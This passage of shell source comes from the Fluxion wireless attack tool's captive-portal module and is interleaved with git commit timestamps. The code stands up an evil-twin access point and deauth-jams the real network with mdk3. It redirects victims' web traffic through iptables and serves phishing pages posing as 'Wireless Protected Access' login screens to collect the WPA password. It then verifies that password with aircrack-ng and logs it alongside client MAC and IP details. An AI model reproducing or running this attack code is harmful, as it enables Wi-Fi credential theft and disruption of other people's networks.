2017-08-08 12:48:00 -06:00
echo
echo -e \" CLIENTS ONLINE:\"
x = 0
for client in \" \$ { DHCPClients[ @] } \" ; do
x = \$ ( ( \$ x+1) )
ClientIP = \$ ( echo \$ client| cut -d \" \" -f2)
ClientMAC = \$ ( nmap -PR -sn -n \$ ClientIP 2>& 1 | grep -i mac | awk '{print \$3}' | tr [ :upper:] [ :lower:] )
if [ \" \$ ( echo \$ ClientMAC| wc -m) \" != \" 18\" ] ; then
ClientMAC = \" xx:xx:xx:xx:xx:xx\"
fi
ClientMID = \$ ( macchanger -l | grep \" \$ ( echo \" \$ ClientMAC\" | cut -d \" :\" -f -3) \" | cut -d \" \" -f 5-)
if echo \$ ClientMAC| grep -q x; then
ClientMID = \" unknown\"
fi
2017-08-09 18:31:32 -06:00
ClientHostname = \$ ( grep \$ ClientIP \" $FLUXIONWorkspacePath /clients.txt\" | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}' )
2017-08-08 12:48:00 -06:00
echo -e \" $CGrn \$ x) $CRed \$ ClientIP $CYel \$ ClientMAC $CClr ( $CBlu \$ ClientMID$CClr ) $CGrn \$ ClientHostname$CClr \"
done
2017-08-09 18:31:32 -06:00
echo -ne \" \0 33[ K\0 33[ u\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
sleep 1" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
echo "
done
if [ \$ AuthenticatorState = \" aborted\" ] ; then exit 1; fi
clear
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /status.txt\"
2017-08-08 12:48:00 -06:00
# sleep 7
sleep 3
signal_stop_attack
echo \"
2017-12-22 00:40:06 -07:00
FLUXION $FLUXIONVersion .$FLUXIONRevision
2017-08-08 12:48:00 -06:00
2017-12-22 00:40:06 -07:00
SSID: \\ \" $staticSSID \\ \"
2017-08-08 12:48:00 -06:00
BSSID: $APTargetMAC ( $APTargetMaker )
Channel: $APTargetChannel
Security: $APTargetEncryption
Time: \$ ih\$ h:\$ im\$ m:\$ is\$ s
Password: \$ ( cat $FLUXIONWorkspacePath /candidate.txt)
2017-12-22 05:57:15 -07:00
Mac: $( captive_portal_get_IP_MAC) ( $( captive_portal_get_MAC_brand) )
2017-12-20 16:21:39 -07:00
IP: $( captive_portal_get_client_IP)
2017-12-22 00:40:06 -07:00
\" >\" $CaptivePortalNetLog /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC .log\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-12-22 00:40:06 -07:00
aircrack-ng -a 2 -b $APTargetMAC -0 -s \" $FLUXIONWorkspacePath /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC .cap\" -w \" $FLUXIONWorkspacePath /candidate.txt\" && echo && echo -e \" The password was saved in " $CRed " $CaptivePortalNetLog /${ APTargetSSIDClean // \" / \\ \" } -$APTargetMAC .log" $CClr " \" \
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
chmod +x " $FLUXIONWorkspacePath /captive_portal_authenticator.sh "
2017-08-08 12:48:00 -06:00
}
# Generate the contents for a generic web interface
function captive_portal_generic( ) {
2017-08-09 18:31:32 -06:00
if [ ! -d " $FLUXIONWorkspacePath /captive_portal " ] ; then
mkdir " $FLUXIONWorkspacePath /captive_portal "
2017-08-08 12:48:00 -06:00
fi
2017-08-21 09:18:31 -06:00
base64 -d " $FLUXIONPath /attacks/Captive Portal/generic/assets " > " $FLUXIONWorkspacePath /file.zip "
2017-08-08 12:48:00 -06:00
2017-08-09 18:31:32 -06:00
unzip " $FLUXIONWorkspacePath /file.zip " -d " $FLUXIONWorkspacePath /captive_portal " & >$FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /file.zip "
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Verifying</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
</head>
<body>
<!-- final page -->
<div id = \" done \" data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_OK </h3>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/final.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Key Mismatch</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Error page -->
<div data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_ERROR </h3>
<a href = \" index.html\" class = \" ui-btn ui-corner-all ui-shadow\" onclick = \" location.href= 'index.html' \" >$DIALOG_WEB_BACK </a>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/error.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Login</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Main page -->
<div data-role= \" page\" data-theme= \" a\" >
<div class = \" ui-content\" dir = \" $DIALOG_WEB_DIR \" >
<fieldset>
<form id = \" loginForm\" class = \" ui-body ui-body-b ui-corner-all\" action = \" check.php\" method = \" POST\" >
</br>
<div class = \" ui-field-contain ui-responsive\" style = \" text-align:center; \" >
<div><u>$APTargetSSID </u> ( $APTargetMAC ) </div>
<!--<div>Channel: $APTargetChannel </div>-->
</div>
<div style = \" text-align:center; \" >
<br>
<label>$DIALOG_WEB_INFO </label>
<br>
</div>
<div class = \" ui-field-contain\" >
<label for = \" key1\" >$DIALOG_WEB_INPUT </label>
<input id = \" key1\" style = \" color:#333; background-color:#CCC\" data-clear-btn= \" true\" type = \" password\" value = \" \" name = \" key1\" maxlength = \" 64\" />
</div>
<input data-icon= \" check\" data-inline= \" true\" name = \" submitBtn\" type = \" submit\" value = \" $DIALOG_WEB_SUBMIT \" />
</form>
</fieldset>
</div>
</div>
<script src = \" js/main.js\" ></script>
<script>
$.extend( $.validator.messages, {
required: \" $DIALOG_WEB_ERROR_MSG \" ,
maxlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MAX \" ) ,
minlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MIN \" )
} ) ;
</script>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/index.html"
2017-08-08 12:48:00 -06:00
}
2017-08-11 02:29:47 -06:00
function captive_portal_unset_routes( ) {
if [ -f " $FLUXIONWorkspacePath /iptables-rules " ] ; then
iptables-restore < " $FLUXIONWorkspacePath /iptables-rules " & > $FLUXIONOutputDevice
sandbox_remove_workfile " $FLUXIONWorkspacePath /iptables-rules "
else
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
fi
# Restore system's original forwarding state
if [ -f " $FLUXIONWorkspacePath /ip_forward " ] ; then
sysctl -w net.ipv4.ip_forward= $( cat " $FLUXIONWorkspacePath /ip_forward " ) & > $FLUXIONOutputDevice
sandbox_remove_workfile " $FLUXIONWorkspacePath /ip_forward "
fi
2017-09-03 14:57:37 -06:00
ip addr del $VIGWAddress /24 dev $VIGW 2> /dev/null
2017-08-11 02:29:47 -06:00
}
2017-08-08 12:48:00 -06:00
# Set up DHCP / WEB server
# Set up DHCP / WEB server
function captive_portal_set_routes( ) {
2017-09-03 14:57:37 -06:00
# Give an address to the gateway interface in the rogue network.
# This makes the interface accessible from the rogue network.
ip addr add $VIGWAddress /24 dev $VIGW
2017-08-08 12:48:00 -06:00
2017-08-11 02:29:47 -06:00
# Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" " $FLUXIONWorkspacePath /ip_forward "
2017-08-08 12:48:00 -06:00
# Activate system IPV4 packet routing/forwarding.
sysctl -w net.ipv4.ip_forward= 1 & >$FLUXIONOutputDevice
2017-08-11 02:29:47 -06:00
iptables-save > " $FLUXIONWorkspacePath /iptables-rules "
2017-08-08 12:48:00 -06:00
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress :80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress :443
iptables -A INPUT -p tcp --sport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
}
2017-08-30 15:41:09 -06:00
function captive_portal_stop_interface( ) {
captive_portal_unset_routes
2017-09-02 18:47:03 -06:00
if [ " $APRogueService " ]
then ap_stop
2017-09-02 14:48:36 -06:00
fi
2017-08-30 15:41:09 -06:00
}
function captive_portal_start_interface( ) {
2017-09-02 18:47:03 -06:00
if [ " $APRogueService " ] ; then
2017-09-02 14:48:36 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStaringAPServiceNotice "
ap_start
2017-09-02 18:47:03 -06:00
else
fluxion_header
echo -e " $FLUXIONVLine Configuration for external access point device: "
echo
fluxion_show_ap_info " $APRogueSSID " "OPEN" " $APTargetChannel " " $APRogueMAC " " $APTargetMaker "
echo -e " $FLUXIONVLine IPv4 Address: ${ VIGWAddress %.* } .2/24 "
echo -e " $FLUXIONVLine IPv6 Address: Disabled "
echo -e " $FLUXIONVLine DHCP Server: $VIGWAddress "
echo -e " $FLUXIONVLine DNS Server: $VIGWAddress "
echo
echo -e " $FLUXIONVLine ${ CYel } Assure external AP device is available & configured before continuing! ${ CClr } "
read -n1 -p "Press any key to continue... " bullshit
2017-09-02 14:48:36 -06:00
fi
2017-08-30 15:41:09 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStaringAPRoutesNotice "
captive_portal_set_routes &
sleep 3
fuser -n tcp -k 53 67 80 443 & > $FLUXIONOutputDevice
fuser -n udp -k 53 67 80 443 & > $FLUXIONOutputDevice
}
2017-08-08 12:48:00 -06:00
function unprep_attack( ) {
CaptivePortalState = "Not Ready"
captive_portal_unset_attack
captive_portal_unset_site
2017-12-06 21:20:22 -07:00
captive_portal_unset_conn
2017-08-08 12:48:00 -06:00
captive_portal_unset_cert
captive_portal_unset_auth
2017-09-02 13:28:45 -06:00
captive_portal_unset_interface
2017-08-08 12:48:00 -06:00
}
function prep_attack( ) {
while true; do
2017-12-05 20:22:06 -07:00
captive_portal_set_interface; if [ $? -ne 0 ] ; then break; fi
captive_portal_set_auth; if [ $? -ne 0 ] ; then
captive_portal_unset_interface; continue
fi
captive_portal_set_cert; if [ $? -ne 0 ] ; then
captive_portal_unset_auth; continue
fi
2017-12-06 21:20:22 -07:00
captive_portal_set_conn; if [ $? -ne 0 ] ; then
2017-12-05 20:22:06 -07:00
captive_portal_unset_cert; continue
fi
2017-12-06 21:20:22 -07:00
captive_portal_set_site; if [ $? -ne 0 ] ; then
captive_portal_unset_conn; continue
fi
2017-12-05 20:22:06 -07:00
captive_portal_set_attack; if [ $? -ne 0 ] ; then
captive_portal_unset_site; continue
fi
2017-08-08 12:48:00 -06:00
CaptivePortalState = "Ready"
break
done
# Check for prep abortion.
2017-12-01 15:05:55 -07:00
if [ " $CaptivePortalState " != "Ready" ] ; then
2017-08-08 12:48:00 -06:00
unprep_attack
return 1;
fi
}
function stop_attack( ) {
# Attempt to find PIDs of any running authenticators.
local authenticatorPID = $( ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}' )
# Signal any authenticator to stop authentication loop.
if [ " $authenticatorPID " ] ; then kill -s SIGABRT $authenticatorPID ; fi
2017-12-06 00:54:49 -07:00
if [ " $CaptivePortalJammerServiceXtermPID " ] ; then
kill $( pgrep -P $CaptivePortalJammerServiceXtermPID 2> $FLUXIONOutputDevice ) & > $FLUXIONOutputDevice
CaptivePortalJammerServiceXtermPID = "" # Clear parent PID
2017-08-08 12:48:00 -06:00
fi
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /mdk3_blacklist.lst "
2017-08-08 12:48:00 -06:00
2017-12-06 00:54:49 -07:00
# Kill captive portal web server log viewer.
if [ " $CaptivePortalWebServiceXtermPID " ] ; then
kill $CaptivePortalWebServiceXtermPID & > $FLUXIONOutputDevice
CaptivePortalWebServiceXtermPID = "" # Clear service PID
fi
2017-08-08 12:48:00 -06:00
# Kill captive portal web server.
2017-12-06 00:54:49 -07:00
if [ " $CaptivePortalWebServicePID " ] ; then
kill $CaptivePortalWebServicePID & > $FLUXIONOutputDevice
CaptivePortalWebServicePID = "" # Clear service PID
2017-08-08 12:48:00 -06:00
fi
# Kill python DNS service if one is found.
2017-12-06 00:54:49 -07:00
if [ " $CaptivePortalDNSServiceXtermPID " ] ; then
kill $( pgrep -P $CaptivePortalDNSServiceXtermPID 2> $FLUXIONOutputDevice ) & > $FLUXIONOutputDevice
CaptivePortalDNSServiceXtermPID = "" # Clear parent PID
2017-08-08 12:48:00 -06:00
fi
# Kill DHCP service.
2017-12-06 00:54:49 -07:00
if [ " $CaptivePortalDHCPServiceXtermPID " ] ; then
kill $( pgrep -P $CaptivePortalDHCPServiceXtermPID 2> $FLUXIONOutputDevice ) & > $FLUXIONOutputDevice
CaptivePortalDHCPServiceXtermPID = "" # Clear parent PID
2017-08-08 12:48:00 -06:00
fi
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /clients.txt "
2017-08-08 12:48:00 -06:00
2017-08-30 15:41:09 -06:00
captive_portal_stop_interface
2017-12-01 15:05:55 -07:00
CaptivePortalState = "Stopped"
2017-08-08 12:48:00 -06:00
}
function start_attack( ) {
if [ " $CaptivePortalState " = "Running" ] ; then return 0; fi
2017-12-01 15:05:55 -07:00
if [ " $CaptivePortalState " != "Ready" ] ; then return 1; fi
CaptivePortalState = "Running"
2017-08-08 12:48:00 -06:00
stop_attack
2017-08-30 15:41:09 -06:00
captive_portal_start_interface
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice "
2017-12-06 00:54:49 -07:00
xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e " dhcpd -d -f -lf \" $FLUXIONWorkspacePath /dhcpd.leases\" -cf \" $FLUXIONWorkspacePath /dhcpd.conf\" $VIGW 2>&1 | tee -a \" $FLUXIONWorkspacePath /clients.txt\" " &
CaptivePortalDHCPServiceXtermPID = $! # Save parent's pid, to get to child later.
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDNSServiceNotice "
2017-12-06 00:54:49 -07:00
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e " if type python2 >/dev/null 2>/dev/null; then python2 \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; else python \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; fi " &
CaptivePortalDNSServiceXtermPID = $! # Save parent's pid, to get to child later.
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingWebServiceNotice "
2017-08-09 18:31:32 -06:00
lighttpd -f " $FLUXIONWorkspacePath /lighttpd.conf " & > $FLUXIONOutputDevice
2017-12-06 00:54:49 -07:00
CaptivePortalWebServicePID = $!
xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e " tail -f \" $FLUXIONWorkspacePath /lighttpd.log\" " &
CaptivePortalWebServiceXtermPID = $!
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingJammerServiceNotice "
2017-08-09 22:30:23 -06:00
echo -e " $APTargetMAC " > " $FLUXIONWorkspacePath /mdk3_blacklist.lst "
2017-12-06 00:54:49 -07:00
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title " FLUXION AP Jammer Service [ $APTargetSSID ] " -e " mdk3 $WIMonitor d -c $APTargetChannel -b \" $FLUXIONWorkspacePath /mdk3_blacklist.lst\" " &
CaptivePortalJammerServiceXtermPID = $! # Save parent's pid, to get to child later.
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice "
2017-12-06 00:54:49 -07:00
xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e " $FLUXIONWorkspacePath /captive_portal_authenticator.sh " &
2017-12-14 06:07:43 -07:00
2017-08-08 12:48:00 -06:00
}
# FLUXSCRIPT END